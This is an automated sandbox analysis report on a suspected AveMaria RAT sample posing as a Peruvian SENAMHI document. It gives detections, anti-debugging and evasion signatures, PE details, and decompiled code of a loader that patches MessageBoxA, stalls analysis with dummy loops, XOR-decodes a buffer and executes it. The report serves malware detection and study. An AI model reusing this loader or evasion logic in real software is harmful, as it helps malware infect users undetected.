Edit tour

Windows Analysis Report
DocumentoSENAMHI20222103.exe

Overview

General Information

Sample Name:	DocumentoSENAMHI20222103.exe
Analysis ID:	593268
MD5:	81ba3d2de48272d692c4e6604e6b1db9
SHA1:	921e7008881d5e0e9a788ee310ddef60b343c647
SHA256:	eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
Tags:	AveMariaRATexeRAT
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Initial sample is a PE file and has a suspicious name

Found potential dummy code loops (likely to delay analysis)

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found large amount of non-executed APIs

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Classification

Process Tree

System is w10x64

DocumentoSENAMHI20222103.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe" MD5: 81BA3D2DE48272D692C4E6604E6B1DB9)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DocumentoSENAMHI20222103.exe

ReversingLabs: Detection: 16%

Source: 0.2.DocumentoSENAMHI20222103.exe.150000.0.unpack	Avira: Label: ADWARE/Adware.Gen8
Source: 0.0.DocumentoSENAMHI20222103.exe.150000.0.unpack	Avira: Label: ADWARE/Adware.Gen8

Source: DocumentoSENAMHI20222103.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: DocumentoSENAMHI20222103.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_0015A22B FindFirstFileExW,

0_2_0015A22B

Source: DocumentoSENAMHI20222103.exe, 00000000.00000002.923038668.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: DocumentoSENAMHI20222103.exe

Source: DocumentoSENAMHI20222103.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: DocumentoSENAMHI20222103.exe, 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe	Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_0015FA9C

0_2_0015FA9C

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: String function: 00154730 appears 34 times

Source: DocumentoSENAMHI20222103.exe

ReversingLabs: Detection: 16%

Source: DocumentoSENAMHI20222103.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_00151B39 __EH_prolog3_catch_GS,__alloca_probe_16,LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary,

0_2_00151B39

Source: classification engine

Classification label: mal56.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_001514A2 CoCreateInstance,

0_2_001514A2

Source: DocumentoSENAMHI20222103.exe

Static file information: File size 1320960 > 1048576

Source: DocumentoSENAMHI20222103.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x129400

Source: DocumentoSENAMHI20222103.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DocumentoSENAMHI20222103.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DocumentoSENAMHI20222103.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DocumentoSENAMHI20222103.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DocumentoSENAMHI20222103.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DocumentoSENAMHI20222103.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DocumentoSENAMHI20222103.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: DocumentoSENAMHI20222103.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe

Source: DocumentoSENAMHI20222103.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DocumentoSENAMHI20222103.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DocumentoSENAMHI20222103.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DocumentoSENAMHI20222103.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DocumentoSENAMHI20222103.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_001601B1 push ecx; ret

0_2_001601C4

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

API coverage: 3.6 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_001571A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

0_2_001571A3

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_0015A22B FindFirstFileExW,

0_2_0015A22B

Anti Debugging

Found potential dummy code loops (likely to delay analysis)

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_00154959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00154959

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe	Code function: 0_2_00157B8E mov eax, dword ptr fs:[00000030h]		0_2_00157B8E
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe	Code function: 0_2_00159DF6 mov eax, dword ptr fs:[00000030h]		0_2_00159DF6

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_001571A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C

0_2_001571A3

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_0015B2B8 GetProcessHeap,

0_2_0015B2B8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe	Code function: 0_2_00154AEF SetUnhandledExceptionFilter,	0_2_00154AEF
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe	Code function: 0_2_00154959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00154959
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe	Code function: 0_2_001542DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001542DA
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe	Code function: 0_2_001572E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001572E0

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_00154775 cpuid

0_2_00154775

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe

Code function: 0_2_00154BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00154BDE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Virtualization/Sandbox Evasion	LSASS Memory	12 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DocumentoSENAMHI20222103.exe	17%	ReversingLabs	Win32.Trojan.Woreflint

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.DocumentoSENAMHI20222103.exe.150000.0.unpack	100%	Avira	ADWARE/Adware.Gen8		Download File
0.0.DocumentoSENAMHI20222103.exe.150000.0.unpack	100%	Avira	ADWARE/Adware.Gen8		Download File

Domains and IPs

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	593268
Start date and time:	2022-03-21 13:31:54 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DocumentoSENAMHI20222103.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 91.6%) Quality average: 76.6% Quality standard deviation: 31.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 49
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
Not all processes where analyzed, report is missing behavior information

Joe Sandbox View / Context

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	2.7480998924776148
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DocumentoSENAMHI20222103.exe
File size:	1320960
MD5:	81ba3d2de48272d692c4e6604e6b1db9
SHA1:	921e7008881d5e0e9a788ee310ddef60b343c647
SHA256:	eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
SHA512:	f53f5aef705bbce8ba6c8d7013425b274ca74b562a832fa9986a7000d14a8bf163869db503e8d6682c4773dea9ddd67fc8ad1a9a78f7a3e98309c9ba540ec89a
SSDEEP:	6144:aNk8vti3OqUP1bq00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+e:Ak8l7D4pa7+ocZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V\-..=C..=C..=C..V@..=C..VF..=C.pEG..=C.pE@..=C.pEF.#=C..VE..=C..VG..=C..VB..=C..=B..=C..DJ..=C..D...=C..=...=C..DA..=C.Rich.=C

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x404718
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6237B381 [Sun Mar 20 23:06:41 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5ed77736e49da7d22b203d8d8f918a6b

Entrypoint Preview

Instruction
call 00007FFA949C4013h
jmp 00007FFA949C397Fh
retn 0000h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00405570h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00419008h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
push ebp
mov ebp, esp
and dword ptr [00542724h], 00000000h
sub esp, 24h
or dword ptr [00419010h], 01h
push 0000000Ah
call dword ptr [0041122Ch]
test eax, eax
je 00007FFA949C3CB2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x174a0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x143000	0xd28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x144000	0x12dc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16380	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x162c0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf9cd	0xfa00	False	0.605875	data	6.61019563742	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x7322	0x7400	False	0.416386045259	data	4.90923942869	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x129e78	0x129400	False	0.133941830057	data	2.29312173446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x143000	0xd28	0xe00	False	0.339006696429	data	3.85073462575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x144000	0x12dc	0x1400	False	0.7365234375	data	6.39751442919	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x1434d0	0xaa	ASCII text	English	United States
TYPELIB	0x1436a0	0x4d0	data	English	United States
RT_DIALOG	0x143580	0x11a	data	English	United States
RT_STRING	0x143b70	0x32	data	English	United States
RT_VERSION	0x1431f0	0x2dc	data	English	United States
RT_MANIFEST	0x143ba8	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	DecodePointer, DeleteCriticalSection, GetTickCount, AcquireSRWLockExclusive, AssignProcessToJobObject, CompareStringW, ConnectNamedPipe, CreateDirectoryW, CreateEventW, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateJobObjectW, CreateMutexW, CreateNamedPipeW, CreateProcessW, CreateRemoteThread, CreateSemaphoreW, DebugBreak, DeleteFileW, DisconnectNamedPipe, DuplicateHandle, EncodePointer, EnterCriticalSection, EnumSystemLocalesEx, EnumSystemLocalesW, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetDateFormatW, GetDriveTypeW, GetEnvironmentStringsW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLocalTime, GetLocaleInfoW, GetLongPathNameW, CreateThread, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHandleCount, GetProcessHeaps, GetProcessId, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDefaultLCID, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadLocale, GetThreadPriority, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultLocaleName, GetModuleFileNameA, SizeofResource, VirtualProtect, SetLastError, VirtualAlloc, LoadLibraryExA, LeaveCriticalSection, FindResourceA, Sleep, IsDBCSLeadByte, LoadResource, WideCharToMultiByte, lstrcmpiA, GetConsoleOutputCP, SetFilePointerEx, SetStdHandle, IsValidCodePage, HeapReAlloc, HeapSize, LCMapStringW, WriteFile, VirtualQuery, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RaiseException, CloseHandle, GetLastError, MultiByteToWideChar, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, RtlUnwind, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetProcessHeap, HeapFree, IsDebuggerPresent, OutputDebugStringW, HeapAlloc, WriteConsoleW
USER32.dll	CharNextA, MessageBoxA
ADVAPI32.dll	RegQueryInfoKeyW, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegDeleteValueA, RegEnumKeyExA, RegCloseKey
ole32.dll	CoCreateInstance, CoTaskMemFree, CoTaskMemRealloc, CoTaskMemAlloc
OLEAUT32.dll	VarUI4FromStr

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	MultiRead
FileVersion	1, 0, 0, 1
ProductName	MultiRead Module
ProductVersion	1, 0, 0, 1
FileDescription	MultiRead Module
OriginalFilename	MultiRead.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Statistics

Disassembly

Reset < >

Analysis Process: DocumentoSENAMHI20222103.exePID: 1268, Parent PID: 3352COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.4%
Total number of Nodes:	859
Total number of Limit Nodes:	15

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00154AEF() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00154AFB); // executed
				return _t1;
			}

0x00154af4
0x00154afa

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00004AFB,0015458F), ref: 00154AF4

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bc85f0bc410adb9eb4e0d29108f4b8823560e69d4b77c8d2b86484fb050d9961
Instruction ID: f11375c4f22a6b4973ddd230cc9c8366044bed9502e6be7c4268db7564a8ad1d
Opcode Fuzzy Hash: bc85f0bc410adb9eb4e0d29108f4b8823560e69d4b77c8d2b86484fb050d9961
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00153A84 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
memorywindowsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00153A84() {
				signed int _v8;
				intOrPtr _v12;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				struct _SECURITY_ATTRIBUTES* _v116;
				void* _v120;
				long _v124;
				signed int _t38;
				void* _t40;
				signed int _t62;
				void* _t63;
				CHAR* _t64;
				signed int _t66;
				void* _t67;
				signed int* _t71;
				signed int _t72;
				_Unknown_base(*)()* _t74;
				signed int _t76;
				signed int _t77;

				_t76 = _t77;
				_t38 =  *0x169008; // 0x26a91022
				_v8 = _t38 ^ _t76;
				asm("movaps xmm0, [0x1662b0]");
				asm("movups [ebp-0x68], xmm0");
				asm("movaps xmm0, [0x166270]");
				asm("movups [ebp-0x58], xmm0");
				asm("movaps xmm0, [0x166280]");
				asm("movups [ebp-0x48], xmm0");
				asm("movaps xmm0, [0x1662a0]");
				asm("movups [ebp-0x38], xmm0");
				asm("movaps xmm0, [0x166290]");
				asm("movups [ebp-0x28], xmm0");
				asm("movaps xmm0, [0x166260]");
				asm("movups [ebp-0x18], xmm0");
				_v12 = 0x9d580485;
				_t40 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
				_t74 = MessageBoxA;
				_v124 = _v124 & 0x00000000;
				_v120 = _t40;
				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v124); // executed
				_t71 = 0x26387c;
				_v109 =  *MessageBoxA;
				_v110 =  *((intOrPtr*)(1));
				_v111 =  *((intOrPtr*)(2));
				_v112 =  *((intOrPtr*)(3));
				 *MessageBoxA = 0x900010c2;
				_v116 = 0;
				do {
					_t62 =  !( *_t71); // executed
					CreateThread(0, 0, _t74, 0, 0, 0); // executed
					if(_t62 != 0) {
						 *(_v116 + _v120) = _t62;
					}
					_v116 = _v116 + 1;
					_t71 = _t71 - 4;
					_push(0);
					_pop(0);
				} while (_t71 >= 0x169880);
				_t63 = 0xea920;
				do {
					_t72 = 0x400;
					do {
						MessageBoxA(0, "rick", "rick", 2);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					_t63 = _t63 - 1;
				} while (_t63 != 0);
				_t64 = "rick";
				do {
					MessageBoxA(0, _t64, _t64, 1);
					_t66 = 0x64;
					_t67 = _v120;
					 *(_t67 + _t72) =  *(_t67 + _t72) ^  *(_t76 + _t72 % _t66 - 0x68);
					_t72 = _t72 + 1;
				} while (_t72 < 0x3e800);
				 *_t74 = _v109;
				 *((char*)(_t74 + 1)) = _v110;
				 *((char*)(_t74 + 2)) = _v111;
				 *((char*)(_t74 + 3)) = _v112;
				 *_t67();
				L12:
				Sleep(0x1388);
				goto L12;
			}

0x00153a87
0x00153a8c
0x00153a93
0x00153a96
0x00153a9d
0x00153aa2
0x00153aaa
0x00153aaf
0x00153ab6
0x00153abc
0x00153ac3
0x00153acc
0x00153ad3
0x00153adc
0x00153ae5
0x00153ae9
0x00153af0
0x00153af6
0x00153afc
0x00153b00
0x00153b0f
0x00153b17
0x00153b1c
0x00153b22
0x00153b28
0x00153b2e
0x00153b33
0x00153b39
0x00153b3c
0x00153b44
0x00153b46
0x00153b4e
0x00153b56
0x00153b56
0x00153b59
0x00153b5c
0x00153b5f
0x00153b61
0x00153b62
0x00153b6a
0x00153b6f
0x00153b6f
0x00153b74
0x00153b82
0x00153b84
0x00153b84
0x00153b89
0x00153b89
0x00153b8e
0x00153b93
0x00153b99
0x00153ba1
0x00153ba4
0x00153bab
0x00153bae
0x00153baf
0x00153bba
0x00153bbf
0x00153bc5
0x00153bcb
0x00153bce
0x00153bd0
0x00153bd5
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00153AF0
VirtualProtect.KERNELBASE(74317E90,00000100,00000040,00000000), ref: 00153B0F
CreateThread.KERNELBASE(00000000,00000000,74317E90,00000000,00000000,00000000), ref: 00153B46
MessageBoxA.USER32 ref: 00153B82
MessageBoxA.USER32 ref: 00153B99
Sleep.KERNEL32(00001388), ref: 00153BD5

Strings

rick, xrefs: 00153B76, 00153B7B, 00153B8E, 00153B95, 00153B96
|8&, xrefs: 00153B17

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: MessageVirtual$AllocCreateProtectSleepThread
String ID: rick$|8&
API String ID: 1205271519-1121119041
Opcode ID: 25b8f335346695120e735eedb78e9dc5a31549052f7cf30f88d3d9513c2700d2
